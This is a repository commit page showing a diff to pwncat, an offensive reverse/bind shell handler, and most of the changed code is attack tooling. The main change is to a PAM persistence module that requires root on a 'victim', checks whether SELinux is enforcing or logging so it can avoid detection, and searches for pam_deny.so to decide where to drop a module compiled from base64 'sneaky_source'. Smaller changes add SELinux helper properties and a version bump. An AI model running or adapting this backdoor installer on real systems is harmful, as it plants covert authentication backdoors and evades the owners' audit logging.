Saverr/pwncat
1
0
Fork 0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-23 17:15:38 +01:00
Code Projects Releases Wiki Activity

Merge branch 'master' into new-logging

Browse Source
This commit is contained in:
Caleb Stewart 2020-07-02 09:49:42 -04:00
commit 40bfd7cb20
3 changed files with 35 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
pwncat/enumerate/system/selinux.py
View File

@ -28,6 +28,14 @@ class SELinuxState(FactData):
result += f"{Fore.YELLOW}{self.state}{Fore.RESET}" result += f"{Fore.YELLOW}{self.state}{Fore.RESET}"
return result return result
@property
def mode(self) -> str:
return self.status.get("Current mode", "unknown").lower()
@property
def enabled(self) -> bool:
return self.state.lower() == "enabled"
@property @property
def description(self): def description(self):
width = max(len(x) for x in self.status) + 1 width = max(len(x) for x in self.status) + 1

37
pwncat/persist/pam.py
View File

@ -9,7 +9,7 @@ from typing import Optional
import pwncat import pwncat
from pwncat import util from pwncat import util
from pwncat.persist import PersistenceMethod, PersistenceError from pwncat.persist import PersistenceMethod, PersistenceError
from pwncat.util import Access, CompilationError from pwncat.util import Access, CompilationError, console
class Method(PersistenceMethod): class Method(PersistenceMethod):
@ -37,6 +37,21 @@ class Method(PersistenceMethod):
if pwncat.victim.current_user.id != 0: if pwncat.victim.current_user.id != 0:
raise PersistenceError("must be root") raise PersistenceError("must be root")
try:
# Enumerate SELinux state
selinux = pwncat.victim.enumerate.first("system.selinux").data
# If enabled and enforced, it will block this from working
if selinux.enabled and "enforc" in selinux.mode:
raise PersistenceError("selinux is currently in enforce mode")
elif selinux.enabled:
# If enabled but permissive, it will log this module
console.log(
"[yellow]warning[/yellow]: selinux is enabled; persistence may be logged"
)
except ValueError:
# SELinux not found
pass
# Source to our module # Source to our module
sneaky_source = textwrap.dedent( sneaky_source = textwrap.dedent(
""" """
@ -195,17 +210,17 @@ Z3YpewogICAgIHJldHVybiBQQU1fSUdOT1JFOwp9Cg==
# Locate the pam_deny.so to know where to place the new module # Locate the pam_deny.so to know where to place the new module
pam_modules = "/usr/lib/security" pam_modules = "/usr/lib/security"
try:
results = ( results = (
pwncat.victim.env(["find", "/", "-name", "pam_deny.so"]) pwncat.victim.run(
.strip() "find / -name pam_deny.so 2>/dev/null | grep -v 'snap/'"
.decode("utf-8")
) )
if results != "": .strip()
results = results.split("\n") .decode("utf-8")
pam_modules = os.path.dirname(results[0]) )
except FileNotFoundError: if results != "":
pass results = results.split("\n")
pam_modules = os.path.dirname(results[0])
# Ensure the directory exists and is writable # Ensure the directory exists and is writable
access = pwncat.victim.access(pam_modules) access = pwncat.victim.access(pam_modules)

2
setup.py
View File

@ -30,7 +30,7 @@ dependency_links = [
# Setup # Setup
setup( setup(
name="pwncat", name="pwncat",
version="0.1", version="0.2.0",
description="A fancy reverse and bind shell handler", description="A fancy reverse and bind shell handler",
author="Caleb Stewart", author="Caleb Stewart",
url="https://gitlab.com/calebstewart/pwncat", url="https://gitlab.com/calebstewart/pwncat",